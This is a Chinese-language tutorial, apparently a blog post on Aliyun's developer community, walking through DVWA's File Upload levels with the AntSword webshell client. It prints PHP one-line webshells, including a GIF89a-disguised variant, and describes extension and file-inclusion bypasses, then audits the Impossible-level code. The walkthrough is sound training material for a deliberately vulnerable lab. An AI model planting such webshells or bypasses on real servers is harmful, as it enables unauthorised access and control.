AI 助理
备案控制台
开发者社区 安全 文章 正文

[网络安全]DVWA之File Upload—AntSword(蚁剑)攻击姿势及解题详析合集

2023-05-22 491
版权
版权声明:
本文内容由阿里云实名注册用户自发贡献,版权归原作者所有,阿里云开发者社区不拥有其著作权,亦不承担相应法律责任。具体规则请查看《 阿里云开发者社区用户服务协议》和 《阿里云开发者社区知识产权保护指引》。如果您发现本社区中有涉嫌抄袭的内容,填写 侵权投诉表单进行举报,一经查实,本社区将立刻删除涉嫌侵权内容。
简介: File Upload—low level源码中无过滤

File Upload—low level

源码中无过滤:

image.png


上传包含一句话木马<?php @eval($_POST[qiushuo]);?>的文件qiu.php

回显上传成功:

image.png

将路径../../hackable/uploads/qiu.php与URLhttp://localhost/dvwa/vulnerabilities/upload/#拼接为http://localhost/dvwa/vulnerabilities/upload/../../hackable/uploads/qiu.php,密码qiushuo,连接蚁剑。

先测试连接:

image.png


连接成功后点击添加,再右键点击文件管理即可。

image.png


自此,DVWA之File Upload—low level解题结束。


URL中#的作用

#是用来指导浏览器动作的,不作用于服务器端。所以,HTTP请求中不包括#。


比如,访问下面的网址,


http://www.example.com/1.htmll#qiushuo.php


浏览器实际发出的请求是这样的:


GET /1.html HTTP/1.1


Host: www.example.com


File Upload—medium level

仍然上传qiu.php,页面回显如下:

image.png

源代码中对文件格式进行过滤:

image.png

修改qiu.php为qiu.jpg,上传。

image.png

由于jpg是不被解析的,所以需要抓包将文件格式修改为php等。

如下图,将filename="qiu.jpg"修改为filename="qiu.php"

image.png

上传成功:

image.png

将路径与URL拼接,连接蚁剑。

image.png

以下步骤同上,不再赘述。

image.png

自此,DVWA之File Upload—medium level解题结束。


File Upload—high level

源码如下:

image.png



代码审计

1.获取上传文件的信息,包括文件名、扩展名、大小和临时文件路径等。


2.判断上传的文件是否为 JPG、JPEG 或 PNG 图片,并且文件大小不超过 100000 字节(即100KB)。strtolower() 可以将字符串转换成小写;

getimagesize() 函数可以判断指定的文件是否为一种可识别的图像格式。


3.将合法的图片文件移动到指定的上传目录中,并输出上传成功的信息;否则输出相应的错误提示信息。


先上传常规木马文件

image.png

high等级强制了文件类型。由于文件类型与后缀名无关,所以修改文件后缀名不能绕过

image.png

更改图片头再上传


GIF89a

<script language="php">eval($_POST['qiushuo']);</script>


回显如下:

image.png

由于Burp修改文件格式发包只能绕过前端,所以此时抓包后将.jpg改为.php是不能绕过的。


文件包含

具体原理不再解释

有时候使用蚁剑登录网站可能需要提供用户名和密码等信息,在蚁剑中设置 Cookie,攻击者便可以在蚁剑中模拟登录目标站点,并保存站点返回的 Cookie 值,从而实现一些需要登录才能访问的功能,比如上传、下载文件等操作。

URL:http://localhost/dvwa/vulnerabilities/fi/?page=file:///D:/Software/PHPStudy/phpstudy_pro/WWW/dvwa/hackable/uploads/2.jpg(图片路径)

密码:qiushuo

获取cookie:

image.png

请求信息栏输入cookie:

image.png

以下操作同上,不再赘述。


自此,DVWA之File Upload—high level解题结束。


File Upload—Impossible level

源代码

<?php
if( isset( $_POST[ 'Upload' ] ) ) {
    // Check Anti-CSRF token
    checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' );
    // File information
    $uploaded_name = $_FILES[ 'uploaded' ][ 'name' ];
    $uploaded_ext  = substr( $uploaded_name, strrpos( $uploaded_name, '.' ) + 1);
    $uploaded_size = $_FILES[ 'uploaded' ][ 'size' ];
    $uploaded_type = $_FILES[ 'uploaded' ][ 'type' ];
    $uploaded_tmp  = $_FILES[ 'uploaded' ][ 'tmp_name' ];
    // Where are we going to be writing to?
    $target_path   = DVWA_WEB_PAGE_TO_ROOT . 'hackable/uploads/';
    //$target_file   = basename( $uploaded_name, '.' . $uploaded_ext ) . '-';
    $target_file   =  md5( uniqid() . $uploaded_name ) . '.' . $uploaded_ext;
    $temp_file     = ( ( ini_get( 'upload_tmp_dir' ) == '' ) ? ( sys_get_temp_dir() ) : ( ini_get( 'upload_tmp_dir' ) ) );
    $temp_file    .= DIRECTORY_SEPARATOR . md5( uniqid() . $uploaded_name ) . '.' . $uploaded_ext;
    // Is it an image?
    if( ( strtolower( $uploaded_ext ) == 'jpg' || strtolower( $uploaded_ext ) == 'jpeg' || strtolower( $uploaded_ext ) == 'png' ) &&
        ( $uploaded_size < 100000 ) &&
        ( $uploaded_type == 'image/jpeg' || $uploaded_type == 'image/png' ) &&
        getimagesize( $uploaded_tmp ) ) {
        // Strip any metadata, by re-encoding image (Note, using php-Imagick is recommended over php-GD)
        if( $uploaded_type == 'image/jpeg' ) {
            $img = imagecreatefromjpeg( $uploaded_tmp );
            imagejpeg( $img, $temp_file, 100);
        }
        else {
            $img = imagecreatefrompng( $uploaded_tmp );
            imagepng( $img, $temp_file, 9);
        }
        imagedestroy( $img );
        // Can we move the file to the web root from the temp folder?
        if( rename( $temp_file, ( getcwd() . DIRECTORY_SEPARATOR . $target_path . $target_file ) ) ) {
            // Yes!
            echo "<pre><a href='{$target_path}{$target_file}'>{$target_file}</a> succesfully uploaded!</pre>";
        }
        else {
            // No
            echo '<pre>Your image was not uploaded.</pre>';
        }
        // Delete any temp files
        if( file_exists( $temp_file ) )
            unlink( $temp_file );
    }
    else {
        // Invalid file
        echo '<pre>Your image was not uploaded. We can only accept JPEG or PNG images.</pre>';
    }
}
// Generate Anti-CSRF token
generateSessionToken();
?>



代码审计

判断提交按钮是否被点击,并检查 Anti-CSRF token 是否合法。

if( isset( $_POST[ 'Upload' ] ) ) {

   // Check Anti-CSRF token

   checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' );

   ...

}


这里通过判断 $_POST[ ‘Upload’ ] 变量是否存在来判断前端页面是否提交了表单。如果提交了表单,则调用 checkToken() 函数来检查提交的 Anti-CSRF token 是否与当前会话中的 token 相等(即防止 CSRF 攻击)。


获取上传文件的相关信息,并定义目标存放路径和文件名等变量。

// File information
$uploaded_name = $_FILES[ 'uploaded' ][ 'name' ];
$uploaded_ext  = substr( $uploaded_name, strrpos( $uploaded_name, '.' ) + 1);
$uploaded_size = $_FILES[ 'uploaded' ][ 'size' ];
$uploaded_type = $_FILES[ 'uploaded' ][ 'type' ];
$uploaded_tmp  = $_FILES[ 'uploaded' ][ 'tmp_name' ];
// Where are we going to be writing to?
$target_path   = DVWA_WEB_PAGE_TO_ROOT . 'hackable/uploads/';
$target_file   =  md5( uniqid() . $uploaded_name ) . '.' . $uploaded_ext;
$temp_file     = ( ( ini_get( 'upload_tmp_dir' ) == '' ) ? ( sys_get_temp_dir() ) : ( ini_get( 'upload_tmp_dir' ) ) );
$temp_file    .= DIRECTORY_SEPARATOR . md5( uniqid() . $uploaded_name ) . '.' . $uploaded_ext;


这里通过 $_FILES 变量获取了上传文件的名称、扩展名、大小、类型和临时文件名等信息,并将其保存到相应的变量中。然后,定义了存放目录、目标文件名和临时文件名三个变量。


检查上传文件是否符合要求。

// Is it an image?
if( ( strtolower( $uploaded_ext ) == 'jpg' || strtolower( $uploaded_ext ) == 'jpeg' || strtolower( $uploaded_ext ) == 'png' ) &&
    ( $uploaded_size < 100000 ) &&
    ( $uploaded_type == 'image/jpeg' || $uploaded_type == 'image/png' ) &&
    getimagesize( $uploaded_tmp ) ) {
    ...
}


这里使用了一系列条件语句来检查上传文件是否符合要求。首先,检查上传文件的扩展名是否为 jpg、jpeg 或 png;然后,检查文件大小是否小于 100KB;接着,检查文件 MIME 类型是否为 image/jpeg 或 image/png;最后,调用 getimagesize() 函数检测上传文件是否是真正的 JPG、JPEG 或 PNG 图片。如果满足以上所有条件,则进入下一步操作。


将临时文件转换为 JPEG 或 PNG 格式的图片,并保存到目标存放路径中。

// Strip any metadata, by re-encoding image (Note, using php-Imagick is recommended over php-GD)
if( $uploaded_type == 'image/jpeg' ) {
    $img = imagecreatefromjpeg( $uploaded_tmp );
    imagejpeg( $img, $temp_file, 100);
}
else {
    $img = imagecreatefrompng( $uploaded_tmp );
    imagepng( $img, $temp_file, 9);
}
imagedestroy( $img );
// Can we move the file to the web root from the temp folder?
if( rename( $temp_file, ( getcwd() . DIRECTORY_SEPARATOR . $target_path . $target_file ) ) ) {
    // Yes!
    echo "<pre><a href='{$target_path}{$target_file}'>{$target_file}</a> succesfully uploaded!</pre>";
}
else {
    // No
    echo '<pre>Your image was not uploaded.</pre>';
}
// Delete any temp files
if( file_exists( $temp_file ) )
    unlink( $temp_file );



这里首先根据文件类型使用 imagecreatefromjpeg() 或 imagecreatefrompng() 函数创建一个新的图片资源,并使用 imagejpeg() 或 imagepng() 函数将其保存为 JPEG 或 PNG 格式的图片,存放到临时文件中。然后,使用 rename() 函数将临时文件移动到指定的目录中,作为最终的上传文件。如果移动成功,则输出上传成功的消息;否则,输出上传失败的消息。最后,删除任何临时文件(如果存在)。


生成新的 Anti-CSRF token。

// Generate Anti-CSRF token

generateSessionToken();


这里调用了 generateSessionToken() 函数,生成一个新的 Anti-CSRF token,以便下一次提交时使用。

自此,DVWA之File Upload—high level解题结束。


总结

以上为[网络安全]DVWA之File Upload—AntSword(蚁剑)攻击姿势及解题详析合集,读者可借此入门AntSword渗透姿势。

我是秋说,我们下次见。


文章标签:
PHP
前端开发
网络安全
数据安全/隐私保护
安全
关键词:
网络安全攻击
网络安全解题
网络安全详析
网络dvwa攻击解题
网络安全dvwa攻击解题详析
秋说
目录
相关文章
运维有小邓
|
1月前
|
安全 数据安全/隐私保护
谨防二维码陷阱:揭秘网络钓鱼攻击与保护措施
当我们深入了解二维码的世界时,了解它们的特性和潜在风险变得至关重要,揭示了伴随其广泛普及的更为阴暗的一面
运维有小邓
53 1
mao29955
|
12天前
|
存储 安全 网络安全
如何识别和防范网络钓鱼攻击?
通过以上方法的综合运用,可以有效识别和防范网络钓鱼攻击,降低遭受网络安全威胁的风险,保护个人信息和财产安全。
mao29955
41 12
wljslmz
|
13天前
|
安全 网络安全 数据安全/隐私保护
社会工程学攻击:了解并预防心理操控的网络欺诈
社会工程学攻击:了解并预防心理操控的网络欺诈
wljslmz
32 7
源码星辰
|
25天前
|
存储 安全 网络安全
互联网上如何有效应对网络勒索攻击?
有效应对网络勒索攻击需要采取多方面的措施,从预防、监测到应急响应和数据恢复等多个环节进行综合防护。
源码星辰
42 4
lsug6eziqmdfk1111
|
1月前
|
安全 网络协议 物联网
物联网僵尸网络和 DDoS 攻击的 CERT 分析
物联网僵尸网络和 DDoS 攻击的 CERT 分析
lsug6eziqmdfk1111
34 0
一位隐者
|
1月前
|
机器学习/深度学习 人工智能 安全
5G网络如何有效抵御拒绝服务(DoS)攻击?
【10月更文挑战第8天】
一位隐者
45 0
bruce刘晓伟-18435
|
1月前
|
Web App开发 测试技术 网络安全
Kali 测试:使用Burp Suite 对网络认证服务的攻击(一)
Kali 渗透测试:使用Burp Suite 对网络认证服务的攻击(一)
bruce刘晓伟-18435
71 0
bruce刘晓伟-18435
|
1月前
|
网络安全 数据安全/隐私保护 安全
Kali 测试:使用Burp Suite 对网络认证服务的攻击(二)
Kali 渗透测试:使用Burp Suite 对网络认证服务的攻击(二)
bruce刘晓伟-18435
126 0
德迅云安全杨德俊
|
2月前
|
云安全 缓存 网络协议
如何防护DDoS攻击,筑牢网络安全防线
随着信息技术的飞速发展,网络已成为现代社会不可或缺的一部分,极大地便利了个人社交和商业活动。然而,网络空间在创造无限机遇的同时,也潜藏着诸多威胁,其中分布式拒绝服务攻击(DDoS,Distributed Denial of Service)以其高破坏力和难以防范的特点,成为网络安全领域的一大挑战。本文将从DDoS攻击的原理出发,详细探讨如何有效防护DDoS攻击,以筑牢网络安全防线。
德迅云安全杨德俊
145 2
mrq4nk6ni2neg
|
8天前
|
存储 SQL 安全
网络安全与信息安全:关于网络安全漏洞、加密技术、安全意识等方面的知识分享
【10月更文挑战第39天】在数字化时代,网络安全和信息安全成为了我们生活中不可或缺的一部分。本文将介绍网络安全漏洞、加密技术和安全意识等方面的内容,帮助读者更好地了解网络安全的重要性,并提供一些实用的技巧和方法来保护自己的信息安全。
mrq4nk6ni2neg
21 2

热门文章

最新文章

  • 1
    揭秘2017双11背后的网络-双11的网络产品和技术概览
  • 2
    【深度神经网络 One-shot Learning】孪生网络少样本精准分类
  • 3
    从头训练一个神经网络!教它学会莫奈风格作画!⛵
  • 4
    windows网络状态显示X,看不到网卡信息
  • 5
    美国国家安全局网络武器被公开,微软宣布已修复可攻破的 Windows 漏洞
  • 6
    1、Windows API函数归总,网络函数、消息函数、文件处理
  • 7
    用C#设计一个基于UDP协议的简单网络聊天器
  • 8
    神经网络梯度下降的三种学习方式
  • 9
    如何延展你的数据中心多模光纤网络
  • 10
    调整DC的网络对网络是否会有影响?
  • 1
    云计算与网络安全:技术融合的未来
    50
  • 2
    网络安全的屏障与密钥:漏洞防御、加密技术与安全意识
    46
  • 3
    网络安全的守护者:漏洞、加密与意识的三维防御
    42
  • 4
    网络安全与信息安全:从漏洞到防护的全方位解析
    63
  • 5
    云计算与网络安全:技术进展与挑战
    51
  • 6
    云计算环境下的网络安全挑战与对策
    57
  • 7
    网络安全与信息安全:漏洞、加密技术与安全意识的交汇点
    39
  • 8
    网络安全与信息安全:关于网络安全漏洞、加密技术、安全意识等方面的知识分享。
    51
  • 9
    网络安全与信息安全:漏洞、加密与安全意识的三重奏
    28
  • 10
    网络安全的前沿防线:漏洞、加密与意识的三重奏
    39

    • 相关课程

    更多
  • 云计算工程师解析与实战-网络专家篇(体验版)
  • 云网络白皮书-阿里云网络系列课
  • 网络安全攻防 - Web渗透测试
  • 企业上云攻略-阿里云网络产品应用系列教程
  • Linux网络进阶 - TCP/IP协议及OSI七层模型
  • 网络管理者必知-2分钟了解新出台的《网络安全法》

    • 相关电子书

    更多
  • Session:更加安全、可靠的数据中心网络产品更新
  • Session:极简易用的全球化网络产品更新
  • Session:弹性、高可用、可观测的应用交付网络产品更新

    • 相关实验场景

    更多
  • 容器的网络入门
  • 容器的自定义网络
  • 容器的共享网络模型
  • 使用阿里云容器服务和容器网络文件系统搭建WordPress网站
    • 下一篇
    无影云桌面